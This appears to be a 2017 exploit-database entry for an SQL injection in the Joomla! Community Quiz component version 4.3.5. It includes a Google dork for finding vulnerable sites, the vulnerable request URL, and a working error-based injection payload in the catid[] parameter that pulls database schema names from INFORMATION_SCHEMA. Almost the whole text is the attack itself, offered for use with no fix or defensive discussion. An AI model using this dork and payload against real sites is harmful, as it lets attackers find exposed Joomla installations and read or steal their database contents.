# # # # # # Exploit Title: Joomla! Component Community Quiz v4.3.5 - SQL Injection # Google Dork: inurl:index.php?option=com_communityquiz # Date: 24.02.2017 # Vendor Homepage: http://corejoomla.com/ # Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/community-quiz/ # Demo: http://demo.corejoomla.com/quiz.html # Version: 4.3.5 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # index.php?option=com_communityquiz&view=search # http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=title&filter_all_keywords=1&filter_order=a.created&filter_order_Dir=asc&catid[]=[SQL]&view=quizzes # 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1 # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-26]